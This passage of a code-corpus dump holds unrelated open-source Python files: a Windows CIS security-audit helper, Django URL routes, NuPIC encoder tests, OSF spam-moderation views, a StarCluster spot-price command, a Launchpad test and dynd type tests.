k, v = line.split('=')
sec_return[k] = v
return sec_return
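# Illustrative sketch of the input this parser expects (typical secedit /export
# content, shown here only as an assumed example):
#   [System Access]
#   MinimumPasswordAge = 1
#   PasswordComplexity = 1
# which would be folded into {'MinimumPasswordAge': '1', 'PasswordComplexity': '1'};
# section headers and the Unicode marker line are skipped.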
def _get_account_sid():
'''This helper function will get all the users and groups on the computer
and return a dictionary'''
win32 = __salt__['cmd.run']('Get-WmiObject win32_useraccount -Filter "localaccount=\'True\'"'
' | Format-List -Property Name, SID', shell='powershell',
python_shell=True)
win32 += '\n'
win32 += __salt__['cmd.run']('Get-WmiObject win32_group -Filter "localaccount=\'True\'" | '
'Format-List -Property Name, SID', shell='powershell',
python_shell=True)
if win32:
dict_return = {}
lines = win32.split('\n')
lines = filter(None, lines)
if 'local:' in lines:
lines.remove('local:')
for line in lines:
line = line.strip()
if line != '' and ' : ' in line:
k, v = line.split(' : ')
if k.lower() == 'name':
key = v
else:
dict_return[key] = v
if dict_return:
if 'LOCAL SERVICE' not in dict_return:
dict_return['LOCAL SERVICE'] = 'S-1-5-19'
if 'NETWORK SERVICE' not in dict_return:
dict_return['NETWORK SERVICE'] = 'S-1-5-20'
if 'SERVICE' not in dict_return:
dict_return['SERVICE'] = 'S-1-5-6'
return dict_return
else:
log.debug('Error parsing the data returned from powershell')
return False
else:
log.debug('error occurred while trying to run powershell '
'get-wmiobject command')
return False
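# Illustrative sketch (hypothetical account names and SIDs): the mapping built above
# looks roughly like
#   {'Administrator': 'S-1-5-21-<machine>-500', 'Guest': 'S-1-5-21-<machine>-501',
#    'LOCAL SERVICE': 'S-1-5-19', 'NETWORK SERVICE': 'S-1-5-20', 'SERVICE': 'S-1-5-6'}
# The three well-known service SIDs are filled in by the fallback branch when
# PowerShell does not report them.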
def _translate_value_type(current, value, evaluator, __sidaccounts__=False):
    '''Compare the current secedit value against the expected value according
    to the given value type. Under the covers this handles the more, less,
    equal, account, and configured comparison types.'''
value = value.lower()
if 'more' in value:
if ',' in evaluator:
evaluator = evaluator.split(',')[1]
if ',' in current:
current = current.split(',')[1]
if '"' in current:
current = current.replace('"', '')
if '"' in evaluator:
evaluator = evaluator.replace('"', '')
if int(current) >= int(evaluator):
return True
else:
return False
elif 'less' in value:
if ',' in evaluator:
evaluator = evaluator.split(',')[1]
if ',' in current:
current = current.split(',')[1]
if '"' in current:
current = current.replace('"', '')
if '"' in evaluator:
evaluator = evaluator.replace('"', '')
if int(current) <= int(evaluator):
if current != '0':
return True
else:
return False
else:
return False
elif 'equal' in value:
if ',' not in evaluator and type(evaluator) != list:
evaluator = _evaluator_translator(evaluator)
if type(current) == list:
ret_final = []
for item in current:
item = item.lower()
if item in evaluator:
ret_final.append(True)
else:
ret_final.append(False)
if False in ret_final:
return False
else:
return True
if current.lower() == evaluator:
return True
else:
return False
elif 'account' in value:
evaluator = _account_audit(evaluator, __sidaccounts__)
evaluator_list = evaluator.split(',')
current_list = current.split(',')
list_match = False
for list_item in evaluator_list:
if list_item in current_list:
list_match = True
else:
list_match = False
break
if list_match:
for list_item in current_list:
if list_item in evaluator_list:
list_match = True
else:
list_match = False
break
else:
return False
if list_match:
return True
else:
return False
elif 'configured' in value:
if current == '':
return False
elif current == value:
return True
else:
return False
else:
return 'Undefined'
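# Illustrative sketch of the comparisons above (made-up registry-style values):
#   _translate_value_type('4,10', 'more than or equal', '4,8')  -> True  (10 >= 8)
#   _translate_value_type('4,5', 'less than or equal', '4,8')   -> True  (5 <= 8, non-zero)
#   _translate_value_type('1', 'equal', 'Enabled')              -> True  (via _evaluator_translator)
# Account-style checks additionally require the __sidaccounts__ mapping produced
# by _get_account_sid().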
def _evaluator_translator(input_string):
'''This helper function takes words from the CIS yaml and replaces
them with what you actually find in the secedit dump'''
if type(input_string) == str:
input_string = input_string.replace(' ','').lower()
if 'enabled' in input_string:
return '1'
elif 'disabled' in input_string:
return '0'
elif 'success' in input_string:
return '1'
elif 'failure' in input_string:
return '2'
elif input_string == 'success,failure' or input_string == 'failure,success':
return '3'
elif input_string in ['0','1','2','3']:
return input_string
else:
log.debug('error translating evaluator from enabled/disabled or success/failure.'
' Could have received incorrect string')
return 'undefined'
def _account_audit(current, __sidaccounts__):
'''This helper function takes the account names from the cis yaml and
replaces them with the account SID that you find in the secedit dump'''
user_list = current.split(', ')
ret_string = ''
if __sidaccounts__:
for usr in user_list:
if usr == 'Guest':
if not ret_string:
ret_string = usr
else:
ret_string += ',' + usr
if usr in __sidaccounts__:
if not ret_string:
ret_string = '*' + __sidaccounts__[usr]
else:
ret_string += ',*' + __sidaccounts__[usr]
return ret_string
else:
log.debug('getting the SIDs for each account failed')
return False
def _reg_value_translator(input_string):
input_string = input_string.lower()
if input_string == 'enabled':
return '4,1'
elif input_string == 'disabled':
return '4,0'
elif input_string == 'users cant add or log on with microsoft accounts':
return '4,3'
elif input_string == 'administrators':
return '1,"0"'
elif input_string == 'lock workstation':
return '1,"1"'
elif input_string == 'accept if provided by client':
return '4,1'
elif input_string == 'classic - local users authenticate as themselves':
return '4,1'
elif input_string == 'rc4_hmac_md5, aes128_hmac_SHA1, aes256_hmac_sha1, future encryption types':
return '4,2147483644'
elif input_string == 'send ntlmv2 response only. Refuse lm & ntlm':
return '4,5'
elif input_string == 'negotiate signing':
return '4,1'
elif input_string == 'require ntlmv2 session security, require 128-bit encryption':
return '4,537395200'
elif input_string == 'prompt for consent on the secure desktop':
return '4,2'
elif input_string == 'automatically deny elevation requests':
return '4,0'
elif input_string == 'defined (blank)':
return '7,'
else:
return input_string
| apache-2.0 | -2,018,792,189,611,448,600 | 36.405276 | 127 | 0.501282 | false |
BridgesLab/mousedb | mousedb/animal/urls/strain.py | 2 | 1299 | """This module is the url dispatcher for strain related views.
It takes the root */strain...* and generates the strain-list, strain-new, strain-edit, strain-delete, and strain-detail views from animal.views."""
from django.conf.urls import url
from mousedb.animal import views
from mousedb.data.views import StrainData, StrainDataCSV
urlpatterns = [
url(r'^$', views.StrainList.as_view(), name="strain-list"),
url(r'^new/?$', views.StrainCreate.as_view(), name="strain-new"),
url(r'^(?P<slug>[-\w]+)/edit/?$', views.StrainUpdate.as_view(), name="strain-edit"),
url(r'^(?P<slug>[-\w]+)/update/?$', views.StrainUpdate.as_view(), name="strain-edit"),
url(r'^(?P<slug>[-\w]+)/delete/?$',
views.StrainDelete.as_view(),
name="strain-delete"),
url(r'^(?P<slug>[-\w]+)/all/?$', views.StrainDetailAll.as_view(), name="strain-all"),
url(r'^(?P<strain_slug>[-\w]+)/data/?$', StrainData.as_view(), name="strain-data"),
url(r'^(?P<strain_slug>[-\w]+)/data.csv$',
StrainDataCSV.as_view(),
name="strain-data-csv"),
url(r'^(?P<strain_slug>[-\w]+)/(?P<breeding_type>[\w-]+)/?$',
views.CrossTypeAnimalList.as_view(),
name="strain-crosstype"),
url(r'^(?P<slug>[-\w]+)/?$', views.StrainDetail.as_view(), name="strain-detail"),
]
| bsd-3-clause | -7,035,022,910,947,002,000 | 45.392857 | 143 | 0.617398 | false |
rcrowder/nupic | tests/unit/nupic/encoders/sdrcategory_test.py | 10 | 10958 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Unit tests for SDR Category encoder"""
import numpy
from nupic.data import SENTINEL_VALUE_FOR_MISSING_DATA
import tempfile
import unittest
from nupic.encoders.sdr_category import SDRCategoryEncoder
try:
import capnp
except ImportError:
capnp = None
if capnp:
from nupic.encoders.sdr_category_capnp import SDRCategoryEncoderProto
class SDRCategoryEncoderTest(unittest.TestCase):
"""Unit tests for SDRCategory encoder class"""
def testSDRCategoryEncoder(self):
# make sure we have > 16 categories so that we have to grow our sdrs
categories = ["ES", "S1", "S2", "S3", "S4", "S5", "S6", "S7", "S8",
"S9","S10", "S11", "S12", "S13", "S14", "S15", "S16",
"S17", "S18", "S19", "GB", "US"]
fieldWidth = 100
bitsOn = 10
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList = categories,
name="foo", verbosity=0, forced=True)
# internal check
self.assertEqual(s.sdrs.shape, (32, fieldWidth))
# ES
es = s.encode("ES")
self.assertEqual(es.sum(), bitsOn)
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
x = s.decode(es)
self.assertIsInstance(x[0], dict)
self.assertTrue("foo" in x[0])
self.assertEqual(x[0]["foo"][1], "ES")
topDown = s.topDownCompute(es)
self.assertEqual(topDown.value, "ES")
self.assertEqual(topDown.scalar, 1)
self.assertEqual(topDown.encoding.sum(), bitsOn)
# ----------------------------------------------------------------------
# Test topdown compute
for v in categories:
output = s.encode(v)
topDown = s.topDownCompute(output)
self.assertEqual(topDown.value, v)
self.assertEqual(topDown.scalar, s.getScalars(v)[0])
bucketIndices = s.getBucketIndices(v)
topDown = s.getBucketInfo(bucketIndices)[0]
self.assertEqual(topDown.value, v)
self.assertEqual(topDown.scalar, s.getScalars(v)[0])
self.assertTrue(numpy.array_equal(topDown.encoding, output))
self.assertEqual(topDown.value, s.getBucketValues()[bucketIndices[0]])
# Unknown
unknown = s.encode("ASDFLKJLK")
self.assertEqual(unknown.sum(), bitsOn)
self.assertEqual(unknown.shape, (fieldWidth,))
self.assertEqual(unknown.sum(), bitsOn)
x = s.decode(unknown)
self.assertEqual(x[0]["foo"][1], "<UNKNOWN>")
topDown = s.topDownCompute(unknown)
self.assertEqual(topDown.value, "<UNKNOWN>")
self.assertEqual(topDown.scalar, 0)
# US
us = s.encode("US")
self.assertEqual(us.sum(), bitsOn)
self.assertEqual(us.shape, (fieldWidth,))
self.assertEqual(us.sum(), bitsOn)
x = s.decode(us)
self.assertEqual(x[0]["foo"][1], "US")
topDown = s.topDownCompute(us)
self.assertEqual(topDown.value, "US")
self.assertEqual(topDown.scalar, len(categories))
self.assertEqual(topDown.encoding.sum(), bitsOn)
# empty field
empty = s.encode(SENTINEL_VALUE_FOR_MISSING_DATA)
self.assertEqual(empty.sum(), 0)
self.assertEqual(empty.shape, (fieldWidth,))
self.assertEqual(empty.sum(), 0)
# make sure it can still be decoded after a change
bit = s.random.getUInt32(s.getWidth()-1)
us[bit] = 1 - us[bit]
x = s.decode(us)
self.assertEqual(x[0]["foo"][1], "US")
# add two reps together
newrep = ((us + unknown) > 0).astype(numpy.uint8)
x = s.decode(newrep)
    name = x[0]["foo"][1]
if name != "US <UNKNOWN>" and name != "<UNKNOWN> US":
othercategory = name.replace("US", "")
othercategory = othercategory.replace("<UNKNOWN>", "")
othercategory = othercategory.replace(" ", "")
otherencoded = s.encode(othercategory)
raise RuntimeError("Decoding failure")
# serialization
# TODO: Remove pickle-based serialization tests -- issues #1419 and #1420
import cPickle as pickle
t = pickle.loads(pickle.dumps(s))
self.assertTrue((t.encode("ES") == es).all())
self.assertTrue((t.encode("GB") == s.encode("GB")).all())
# Test autogrow
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList=None,
name="bar", forced=True)
es = s.encode("ES")
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
x = s.decode(es)
self.assertIsInstance(x[0], dict)
self.assertTrue("bar" in x[0])
self.assertEqual(x[0]["bar"][1], "ES")
us = s.encode("US")
self.assertEqual(us.shape, (fieldWidth,))
self.assertEqual(us.sum(), bitsOn)
x = s.decode(us)
self.assertEqual(x[0]["bar"][1], "US")
es2 = s.encode("ES")
self.assertTrue(numpy.array_equal(es2, es))
us2 = s.encode("US")
self.assertTrue(numpy.array_equal(us2, us))
# make sure it can still be decoded after a change
bit = s.random.getUInt32(s.getWidth() - 1)
us[bit] = 1 - us[bit]
x = s.decode(us)
self.assertEqual(x[0]["bar"][1], "US")
# add two reps together
newrep = ((us + es) > 0).astype(numpy.uint8)
x = s.decode(newrep)
name = x[0]["bar"][1]
self.assertTrue(name == "US ES" or name == "ES US")
# Catch duplicate categories
caughtException = False
newcategories = categories[:]
self.assertTrue("ES" in newcategories)
newcategories.append("ES")
try:
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn,
categoryList=newcategories, name="foo",
forced=True)
except RuntimeError, e:
caughtException = True
finally:
if not caughtException:
raise RuntimeError("Did not catch duplicate category in constructor")
# serialization for autogrow encoder
gs = s.encode("GS")
# TODO: Remove as part of issues #1419 and #1420
t = pickle.loads(pickle.dumps(s))
self.assertTrue(numpy.array_equal(t.encode("ES"), es))
self.assertTrue(numpy.array_equal(t.encode("GS"), gs))
# -----------------------------------------------------------------------
def testAutogrow(self):
"""testing auto-grow"""
fieldWidth = 100
bitsOn = 10
s = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, name="foo", verbosity=2,
forced=True)
encoded = numpy.zeros(fieldWidth)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
s.encodeIntoArray("catA", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catA"), 1)
catA = encoded.copy()
s.encodeIntoArray("catB", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catB"), 2)
catB = encoded.copy()
self.assertEqual(s.topDownCompute(catA).value, "catA")
self.assertEqual(s.topDownCompute(catB).value, "catB")
s.encodeIntoArray(SENTINEL_VALUE_FOR_MISSING_DATA, encoded)
self.assertEqual(sum(encoded), 0)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
#Test Disabling Learning and autogrow
s.setLearning(False)
s.encodeIntoArray("catC", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catC"), 0)
self.assertEqual(s.topDownCompute(encoded).value, "<UNKNOWN>")
s.setLearning(True)
s.encodeIntoArray("catC", encoded)
self.assertEqual(encoded.sum(), bitsOn)
self.assertEqual(s.getScalars("catC"), 3)
self.assertEqual(s.topDownCompute(encoded).value, "catC")
@unittest.skipUnless(
capnp, "pycapnp is not installed, skipping serialization test.")
def testReadWrite(self):
categories = ["ES", "S1", "S2", "S3", "S4", "S5", "S6", "S7", "S8",
"S9","S10", "S11", "S12", "S13", "S14", "S15", "S16",
"S17", "S18", "S19", "GB", "US"]
fieldWidth = 100
bitsOn = 10
original = SDRCategoryEncoder(n=fieldWidth, w=bitsOn,
categoryList=categories,
name="foo", verbosity=0, forced=True)
# internal check
self.assertEqual(original.sdrs.shape, (32, fieldWidth))
# ES
es = original.encode("ES")
self.assertEqual(es.sum(), bitsOn)
self.assertEqual(es.shape, (fieldWidth,))
self.assertEqual(es.sum(), bitsOn)
decoded = original.decode(es)
proto1 = SDRCategoryEncoderProto.new_message()
original.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SDRCategoryEncoderProto.read(f)
encoder = SDRCategoryEncoder.read(proto2)
self.assertIsInstance(encoder, SDRCategoryEncoder)
self.assertEqual(encoder.n, original.n)
self.assertEqual(encoder.w, original.w)
self.assertEqual(encoder.verbosity, original.verbosity)
self.assertEqual(encoder.description, original.description)
self.assertEqual(encoder.name, original.name)
self.assertDictEqual(encoder.categoryToIndex, original.categoryToIndex)
self.assertTrue(numpy.array_equal(encoder.encode("ES"), es))
self.assertEqual(original.decode(encoder.encode("ES")),
encoder.decode(original.encode("ES")))
self.assertEqual(decoded, encoder.decode(es))
# Test autogrow serialization
autogrow = SDRCategoryEncoder(n=fieldWidth, w=bitsOn, categoryList = None,
name="bar", forced=True)
es = autogrow.encode("ES")
us = autogrow.encode("US")
gs = autogrow.encode("GS")
proto1 = SDRCategoryEncoderProto.new_message()
autogrow.write(proto1)
# Write the proto to a temp file and read it back into a new proto
with tempfile.TemporaryFile() as f:
proto1.write(f)
f.seek(0)
proto2 = SDRCategoryEncoderProto.read(f)
t = SDRCategoryEncoder.read(proto2)
self.assertTrue(numpy.array_equal(t.encode("ES"), es))
self.assertTrue(numpy.array_equal(t.encode("US"), us))
self.assertTrue(numpy.array_equal(t.encode("GS"), gs))
if __name__ == "__main__":
unittest.main()
| agpl-3.0 | -6,725,890,087,020,795,000 | 32.613497 | 78 | 0.633966 | false |
cwisecarver/osf.io | admin/spam/views.py | 13 | 5073 | from __future__ import unicode_literals
from django.views.generic import FormView, ListView, DetailView
from django.contrib.auth.mixins import PermissionRequiredMixin
from django.http import Http404
from osf.models.comment import Comment
from osf.models.user import OSFUser
from osf.models import SpamStatus
from osf.models.admin_log_entry import (
update_admin_log,
CONFIRM_HAM,
CONFIRM_SPAM,
)
from admin.spam.serializers import serialize_comment
from admin.spam.forms import ConfirmForm
from admin.spam.templatetags.spam_extras import reverse_spam_detail
class EmailView(PermissionRequiredMixin, DetailView):
template_name = 'spam/email.html'
context_object_name = 'spam'
permission_required = 'osf.view_spam'
def get_object(self, queryset=None):
spam_id = self.kwargs.get('spam_id')
try:
return serialize_comment(Comment.load(spam_id))
except AttributeError:
raise Http404('Spam with id {} not found.'.format(spam_id))
class SpamList(PermissionRequiredMixin, ListView):
""" Allow authorized admin user to see the things people have marked as spam
Interface with OSF database. No admin models.
"""
template_name = 'spam/spam_list.html'
paginate_by = 10
paginate_orphans = 1
ordering = '-date_last_reported'
context_object_name = 'spam'
permission_required = 'osf.view_spam'
raise_exception = True
def get_queryset(self):
return Comment.objects.filter(
spam_status=int(self.request.GET.get('status', '1'))
).exclude(reports={}).exclude(reports=None)
def get_context_data(self, **kwargs):
queryset = kwargs.pop('object_list', self.object_list)
page_size = self.get_paginate_by(queryset)
paginator, page, queryset, is_paginated = self.paginate_queryset(
queryset, page_size)
kwargs.setdefault('spam', map(serialize_comment, queryset))
kwargs.setdefault('page', page)
kwargs.setdefault('status', self.request.GET.get('status', '1'))
kwargs.setdefault('page_number', page.number)
return super(SpamList, self).get_context_data(**kwargs)
class UserSpamList(SpamList):
""" Allow authorized admin user to see the comments a user has had
marked spam
Interface with OSF database. No admin models.
"""
template_name = 'spam/user.html'
def get_queryset(self):
user = OSFUser.load(self.kwargs.get('user_id', None))
return Comment.objects.filter(
spam_status=int(self.request.GET.get('status', '1')),
user=user
).exclude(reports={}).exclude(reports=None).order_by(self.ordering)
def get_context_data(self, **kwargs):
kwargs.setdefault('user_id', self.kwargs.get('user_id', None))
return super(UserSpamList, self).get_context_data(**kwargs)
class SpamDetail(PermissionRequiredMixin, FormView):
""" Allow authorized admin user to see details of reported spam.
Interface with OSF database. Logs action (confirming spam) on admin db.
"""
form_class = ConfirmForm
template_name = 'spam/detail.html'
permission_required = 'osf.view_spam'
raise_exception = True
def get_context_data(self, **kwargs):
spam_id = self.kwargs.get('spam_id')
kwargs = super(SpamDetail, self).get_context_data(**kwargs)
try:
kwargs.setdefault('comment',
serialize_comment(Comment.load(spam_id)))
except AttributeError:
raise Http404('Spam with id "{}" not found.'.format(spam_id))
kwargs.setdefault('page_number', self.request.GET.get('page', '1'))
kwargs.setdefault('status', self.request.GET.get('status', '1'))
kwargs.update({'SPAM_STATUS': SpamStatus}) # Pass status in to check against
return kwargs
def form_valid(self, form):
spam_id = self.kwargs.get('spam_id')
item = Comment.load(spam_id)
try:
if int(form.cleaned_data.get('confirm')) == SpamStatus.SPAM:
item.confirm_spam()
item.is_deleted = True
log_message = 'Confirmed SPAM: {}'.format(spam_id)
log_action = CONFIRM_SPAM
else:
item.confirm_ham()
item.is_deleted = False
log_message = 'Confirmed HAM: {}'.format(spam_id)
log_action = CONFIRM_HAM
item.save()
except AttributeError:
raise Http404('Spam with id "{}" not found.'.format(spam_id))
update_admin_log(
user_id=self.request.user.id,
object_id=spam_id,
object_repr='Comment',
message=log_message,
action_flag=log_action
)
return super(SpamDetail, self).form_valid(form)
@property
def success_url(self):
return reverse_spam_detail(
self.kwargs.get('spam_id'),
page=self.request.GET.get('page', '1'),
status=self.request.GET.get('status', '1')
)
| apache-2.0 | 246,785,988,212,605,500 | 35.235714 | 85 | 0.632367 | false |
datacratic/StarCluster | starcluster/commands/spothistory.py | 4 | 6149 | # Copyright 2009-2014 Justin Riley
#
# This file is part of StarCluster.
#
# StarCluster is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# StarCluster is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with StarCluster. If not, see <http://www.gnu.org/licenses/>.
from datetime import timedelta
from starcluster import utils
from starcluster import static
from base import CmdBase
class CmdSpotHistory(CmdBase):
"""
spothistory [options] <instance_type>
Show spot instance pricing history stats (last 30 days by default)
Examples:
Show the current, max, and average spot price for m1.small instance type:
$ starcluster spothistory m1.small
Do the same but also plot the spot history over time in a web browser:
$ starcluster spothistory -p m1.small
Show it based on a current cluster config and zone
$ starcluster spothistory -c <cluster-name>
"""
names = ['spothistory', 'shi']
def addopts(self, parser):
parser.add_option("-z", "--zone", dest="zone", default=None,
help="limit results to specific availability zone")
parser.add_option("-d", "--days", dest="days_ago",
action="store", type="float", default=None,
help="provide history in the last DAYS_AGO days "
"(overrides -s option)")
parser.add_option("-s", "--start-time", dest="start_time",
action="callback", type="string", default=None,
callback=self._iso_timestamp,
help="show price history after START_TIME (UTC)"
"(e.g. 2010-01-15T22:22:22Z)")
parser.add_option("-e", "--end-time", dest="end_time",
action="callback", type="string", default=None,
callback=self._iso_timestamp,
help="show price history up until END_TIME (UTC)"
"(e.g. 2010-02-15T22:22:22Z)")
parser.add_option("-p", "--plot", dest="plot",
action="store_true", default=False,
help="plot spot history in a web browser")
parser.add_option("--cluster-name", dest="cluster_name",
default=None,
help="limit results to the clusters master node "
"availability zone")
parser.add_option("-v", "--vpc", dest="vpc",
action="store_true", default=False,
help="show spot prices for VPC")
parser.add_option("-c", "--classic", dest="classic",
action="store_true", default=False,
help="show spot prices for EC2-Classic")
def execute(self, args):
instance_types = ', '.join(static.INSTANCE_TYPES.keys())
zone = None
instance_type = None
if self.opts.cluster_name:
cl = self.cm.get_cluster(self.opts.cluster_name,
require_keys=False)
instance_type = cl.node_instance_type
zone = cl.nodes[0].placement
self.log.info("Cluster zone: " + zone)
self.log.info("Cluster node instance type: " + instance_type)
if self.opts.zone:
if zone:
self.log.info("You specified a zone and a cluster to get the "
"zone from. Using the cluster zone.")
else:
zone = self.opts.zone
self.log.info("Specified zone: " + zone)
if instance_type:
if len(args) == 1:
self.log.info("You provided an instance type and a cluster to "
"get the instance type from. Using the cluster "
"instance type.")
elif len(args) != 1:
self.parser.error(
'please provide an instance type (options: %s)' %
instance_types)
else:
instance_type = args[0]
self.log.info("Specified instance type: " + instance_type)
if instance_type not in static.INSTANCE_TYPES:
self.parser.error(
'invalid instance type. possible options: %s' %
instance_types)
if self.opts.classic and self.opts.vpc:
self.parser.error("options -c and -v cannot be specified at "
"the same time")
start = self.opts.start_time
end = self.opts.end_time
if self.opts.days_ago:
if self.opts.start_time:
self.parser.error("options -d and -s cannot be specified at "
"the same time")
if self.opts.end_time:
end_tup = utils.iso_to_datetime_tuple(self.opts.end_time)
else:
end_tup = utils.get_utc_now()
start = utils.datetime_tuple_to_iso(
end_tup - timedelta(days=self.opts.days_ago))
browser_cmd = self.cfg.globals.get("web_browser")
self.ec2.get_spot_history(instance_type, start, end,
zone=self.opts.zone, plot=self.opts.plot,
plot_web_browser=browser_cmd,
vpc=self.opts.vpc,
classic=self.opts.classic)
| gpl-3.0 | 3,046,816,515,218,756,600 | 43.23741 | 79 | 0.547081 | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/soyuz/tests/test_archive_agent.py | 1 | 1395 | # Copyright 2010-2012 Canonical Ltd. This software is licensed under the GNU
# Affero General Public License version 3 (see the file LICENSE).
"""Test Archive software center agent celebrity."""
from zope.component import getUtility
from lp.app.interfaces.launchpad import ILaunchpadCelebrities
from lp.testing import (
celebrity_logged_in,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestSoftwareCenterAgent(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_getArchiveSubscriptionURL(self):
# The software center agent can get subscription URLs for any
# archive that it's an owner of.
owner = self.factory.makePerson()
agent = getUtility(ILaunchpadCelebrities).software_center_agent
ppa_owner = self.factory.makeTeam(members=[owner, agent])
ppa = self.factory.makeArchive(owner=ppa_owner, private=True)
person = self.factory.makePerson()
with celebrity_logged_in('software_center_agent') as agent:
sources = person.getArchiveSubscriptionURL(agent, ppa)
with person_logged_in(ppa.owner):
authtoken = ppa.getAuthToken(person).token
url = ppa.archive_url.split('http://')[1]
new_url = "http://%s:%s@%s" % (person.name, authtoken, url)
self.assertEqual(sources, new_url)
| agpl-3.0 | 359,916,961,174,090,050 | 38.857143 | 77 | 0.706093 | false |
ContinuumIO/dynd-python | dynd/ndt/test/test_dtype.py | 5 | 8514 | import sys
import ctypes
import unittest
from dynd import ndt
class TestType(unittest.TestCase):
def test_tuple(self):
tp = ndt.tuple(ndt.int32, ndt.float64)
def test_struct(self):
tp = ndt.struct(x = ndt.int32, y = ndt.float64)
def test_callable(self):
tp = ndt.callable(ndt.void, ndt.int32, ndt.float64, x = ndt.complex128)
class TestTypeFor(unittest.TestCase):
def test_bool(self):
self.assertEqual(ndt.bool, ndt.type_for(True))
self.assertEqual(ndt.bool, ndt.type_for(False))
def test_int(self):
self.assertEqual(ndt.int32, ndt.type_for(0))
self.assertEqual(ndt.int32, ndt.type_for(1))
self.assertEqual(ndt.int32, ndt.type_for(7))
def test_float(self):
pass
class TestDType(unittest.TestCase):
def test_bool_type_properties(self):
self.assertEqual(type(ndt.bool), ndt.type)
self.assertEqual(str(ndt.bool), 'bool')
self.assertEqual(ndt.bool.data_size, 1)
self.assertEqual(ndt.bool.data_alignment, 1)
def test_int_type_properties(self):
self.assertEqual(type(ndt.int8), ndt.type)
self.assertEqual(str(ndt.int8), 'int8')
self.assertEqual(ndt.int8.data_size, 1)
self.assertEqual(ndt.int8.data_alignment, 1)
self.assertEqual(type(ndt.int16), ndt.type)
self.assertEqual(str(ndt.int16), 'int16')
self.assertEqual(ndt.int16.data_size, 2)
self.assertEqual(ndt.int16.data_alignment, 2)
self.assertEqual(type(ndt.int32), ndt.type)
self.assertEqual(str(ndt.int32), 'int32')
self.assertEqual(ndt.int32.data_size, 4)
self.assertEqual(ndt.int32.data_alignment, 4)
self.assertEqual(type(ndt.int64), ndt.type)
self.assertEqual(str(ndt.int64), 'int64')
self.assertEqual(ndt.int64.data_size, 8)
self.assertTrue(ndt.int64.data_alignment in [4,8])
self.assertEqual(type(ndt.intptr), ndt.type)
if ctypes.sizeof(ctypes.c_void_p) == 4:
self.assertEqual(str(ndt.intptr), 'int32')
self.assertEqual(ndt.intptr.data_size, 4)
self.assertEqual(ndt.intptr.data_alignment, 4)
else:
self.assertEqual(str(ndt.intptr), 'int64')
self.assertEqual(ndt.intptr.data_size, 8)
self.assertEqual(ndt.intptr.data_alignment, 8)
def test_uint_type_properties(self):
self.assertEqual(type(ndt.uint8), ndt.type)
self.assertEqual(str(ndt.uint8), 'uint8')
self.assertEqual(ndt.uint8.data_size, 1)
self.assertEqual(ndt.uint8.data_alignment, 1)
self.assertEqual(type(ndt.uint16), ndt.type)
self.assertEqual(str(ndt.uint16), 'uint16')
self.assertEqual(ndt.uint16.data_size, 2)
self.assertEqual(ndt.uint16.data_alignment, 2)
self.assertEqual(type(ndt.uint32), ndt.type)
self.assertEqual(str(ndt.uint32), 'uint32')
self.assertEqual(ndt.uint32.data_size, 4)
self.assertEqual(ndt.uint32.data_alignment, 4)
self.assertEqual(type(ndt.uint64), ndt.type)
self.assertEqual(str(ndt.uint64), 'uint64')
self.assertEqual(ndt.uint64.data_size, 8)
self.assertTrue(ndt.uint64.data_alignment in [4,8])
self.assertEqual(type(ndt.uintptr), ndt.type)
if ctypes.sizeof(ctypes.c_void_p) == 4:
self.assertEqual(str(ndt.uintptr), 'uint32')
self.assertEqual(ndt.uintptr.data_size, 4)
self.assertEqual(ndt.uintptr.data_alignment, 4)
else:
self.assertEqual(str(ndt.uintptr), 'uint64')
self.assertEqual(ndt.uintptr.data_size, 8)
self.assertEqual(ndt.uintptr.data_alignment, 8)
def test_float_type_properties(self):
self.assertEqual(type(ndt.float32), ndt.type)
self.assertEqual(str(ndt.float32), 'float32')
self.assertEqual(ndt.float32.data_size, 4)
self.assertEqual(ndt.float32.data_alignment, 4)
self.assertEqual(type(ndt.float64), ndt.type)
self.assertEqual(str(ndt.float64), 'float64')
self.assertEqual(ndt.float64.data_size, 8)
self.assertTrue(ndt.float64.data_alignment in [4,8])
def test_complex_type_properties(self):
self.assertEqual(type(ndt.complex_float32), ndt.type)
self.assertEqual(str(ndt.complex_float32), 'complex[float32]')
self.assertEqual(ndt.complex_float32.data_size, 8)
self.assertEqual(ndt.complex_float32.data_alignment, 4)
self.assertEqual(type(ndt.complex_float64), ndt.type)
self.assertEqual(str(ndt.complex_float64), 'complex[float64]')
self.assertEqual(ndt.complex_float64.data_size, 16)
self.assertTrue(ndt.complex_float64.data_alignment in [4,8])
